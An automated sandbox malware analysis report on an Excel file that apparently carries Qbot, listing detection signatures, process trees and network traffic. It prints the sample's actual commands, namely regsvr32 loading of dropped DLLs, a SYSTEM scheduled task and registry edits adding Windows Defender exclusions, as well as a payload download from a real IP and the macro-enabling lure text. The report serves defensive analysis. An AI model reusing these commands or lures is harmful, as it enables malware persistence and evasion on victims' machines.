Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Compensation-1214892625-09272021.xls

Overview

General Information

Sample Name:Compensation-1214892625-09272021.xls
Analysis ID:492195
MD5:cbf2562df8735334741b3de3ef9a0362
SHA1:db3bff7a0edc4dd7e3f4915dc36888f3be97c814
SHA256:1b663952d7fa9e49cd53878bfddf2e2906788cbc7394b081e0fea52efd1fb6d1
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 344 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1832 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2176 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2980 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2908 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2808 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2540 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 2932 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2984 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 2072 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 1840 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2092 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Otovcuqo' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 1476 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2532 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Compensation-1214892625-09272021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
        0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
          00000006.00000002.609100712.0000000000200000.00000004.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
            0000000D.00000002.622702900.0000000000420000.00000004.00000001.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              6.2.regsvr32.exe.200000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                7.2.explorer.exe.80000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                  6.2.regsvr32.exe.200000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                    13.2.regsvr32.exe.420000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                      7.2.explorer.exe.80000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                        Click to see the 1 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 344, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 1832
                        Sigma detected: Regsvr32 Command Line Without DLLShow sources
                        Source: Process startedAuthor: Florian Roth: Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1832, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 2176

                        Persistence and Installation Behavior:

                        barindex
                        Sigma detected: Schedule system processShow sources
                        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2980, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30, ProcessId: 2908

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: Compensation-1214892625-09272021.xlsReversingLabs: Detection: 11%
                        Machine Learning detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].datJoe Sandbox ML: detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.611132959.00000000026A1000.00000004.00000001.sdmp
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,6_2_1000AEB4
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,7_2_0008AEB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,13_2_1000AEB4
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,14_2_0008AEB4

                        Software Vulnerabilities:

                        barindex
                        Document exploit detected (drops PE files)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 44467.5523376157[1].dat.0.drJump to dropped file
                        Document exploit detected (process start blacklist hit)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                        Document exploit detected (UrlDownloadToFile)Show sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.14.37.178:80
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 11:16:17 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44467.5523376157.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: GET /44467.5523376157.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.178
                        Source: explorer.exe, 00000007.00000002.875570398.00000000022B0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: regsvr32.exe, 00000005.00000002.611948922.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.609589480.0000000001ED0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.612616089.0000000001C40000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.613822412.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.624790333.0000000000980000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                        Source: regsvr32.exe, 00000006.00000002.609965037.00000000021D0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.875570398.00000000022B0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].datJump to behavior
                        Source: global trafficHTTP traffic detected: GET /44467.5523376157.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive

                        System Summary:

                        barindex
                        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                        Source: Document image extraction number: 0Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
                        Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
                        Source: Document image extraction number: 0Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
                        Source: Screenshot number: 4Screenshot OCR: Enable Editing ) 23 24 25 2. Click to "Enable Content" to perform Microsoft Excel Decryption Core
                        Source: Screenshot number: 4Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
                        Source: Screenshot number: 4Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
                        Office process drops PE fileShow sources
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.5523376157[1].datJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Drezd.red
                        PE file has nameless sectionsShow sources
                        Source: 44467.5523376157[1].dat.0.drStatic PE information: section name:
                        Source: 44467.5523376157[1].dat.0.drStatic PE information: section name:
                        Source: 44467.5523376157[1].dat.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.0.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.7.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: Drezd.red.14.drStatic PE information: section name:
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10016EB06_2_10016EB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_100123466_2_10012346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_100117586_2_10011758
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_10014FC06_2_10014FC0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00096EB07_2_00096EB0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000923467_2_00092346
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000917587_2_00091758
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00094FC07_2_00094FC0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00782C4113_2_00782C41
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078242A13_2_0078242A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078142413_2_00781424
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078372613_2_00783726
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078307313_2_00783073
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_007832EB13_2_007832EB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078416213_2_00784162
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_007834DA13_2_007834DA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00781C5D13_2_00781C5D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078182713_2_00781827
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078B11413_2_0078B114
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078449513_2_00784495
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_00781D8913_2_00781D89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_0078100013_2_00781000
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10016EB013_2_10016EB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001234613_2_10012346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1001175813_2_10011758
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_10014FC013_2_10014FC0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00096EB014_2_00096EB0
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0009234614_2_00092346
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0009175814_2_00091758
                        Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00094FC014_2_00094FC0
                        Source: Compensation-1214892625-09272021.xlsOLE, VBA macro line: Sub auto_open()
                        Source: Compensation-1214892625-09272021.xlsOLE, VBA macro line: Sub auto_close()
                        Source: Compensation-1214892625-09272021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
                        Source: Compensation-1214892625-09272021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,6_2_1000C6C0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,6_2_1000CB77
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,13_2_1000C6C0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 13_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,13_2_1000CB77
                        Source: Drezd.red.14.drStatic PE information: No import functions for PE file found
                        Source: Drezd.red.7.drStatic PE information: No import functions for PE file found
                        Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0'
                        Source: Compensation-1214892625-09272021.xlsOLE indicator, VBA macros: true
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: Compensation-1214892625-09272021.xlsReversingLabs: Detection: 11%
                        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: .................................&_.....(.P.............................q.......................................................................Jump to behavior
                        Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........H.%.....N.......(...............Jump to behavior
                        Source: C:\Windows\System32\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........H.......N.......(...............Jump to behavior
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
